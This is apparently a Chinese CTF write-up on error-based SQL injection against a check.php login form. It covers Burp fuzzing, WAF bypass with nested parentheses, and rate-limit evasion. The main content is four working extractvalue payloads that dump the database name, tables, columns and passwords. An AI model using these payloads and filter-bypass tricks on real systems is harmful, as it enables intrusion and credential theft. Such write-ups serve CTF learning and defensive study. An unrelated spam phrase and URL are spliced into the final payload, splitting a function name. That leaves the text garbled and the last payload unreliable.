本文详细描述了一次通过Burp Suite进行SQL注入攻击的过程,包括GET型参数的fuzzing,发现WAF的存在,以及如何通过设置请求延迟来避免429错误。作者探讨了单引号引发的错误响应,利用or和#绕过过滤,并采用括号嵌套的方法来规避过滤。通过left和right函数截取信息,逐步揭露数据库信息。此外,还提到了extractvalue和updatexml函数在报错注入中的限制。
用burp抓包后发现这并不是POST类型,而是在check.php页面的GET型。
对用户名字段和密码字段进行fuzz,检查是否有过滤,发现存在waf。这里用得burp的intruder,不过要设置一定的请求延迟,否则容易返回429。
由于单引号引起了报错(会有报错信息返回),or和#未经过滤,尝试报错注入。空格也会触发waf,于是使用括号进行多层嵌套绕过对括号的过滤。由于返回的字符串长度有限,因此使用left和right函数分别从左右截断获取完整的信息。或仅使用right函数,控制其截取长度的参数不断增大,可以自右至左获取查询结果的全貌。
payload:
爆库名/check.php?username=admin&password=a'or(extractvalue(1,concat(0x7e,database(),0x7e)))%23爆表名/check.php?username=admin&password=a'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like('geek')),0x7e)))%23爆列名/check.php?username=admin&password=a'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e)))%23爆数据/check.php?username=admin&password=a'or(extractvalue(1,concat(0x7e,(select(rig 陕西干部培训 http://sx.ganxun.cn/ ht(password,30))from(geek.H4rDsq1)),0x7e)))%23后来看到原来是报错函数extractvalue限制每次查询出的字符串长度最大为32,又尝试了updatexml函数,与extractvalue函数一致。
扫一扫
3042
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
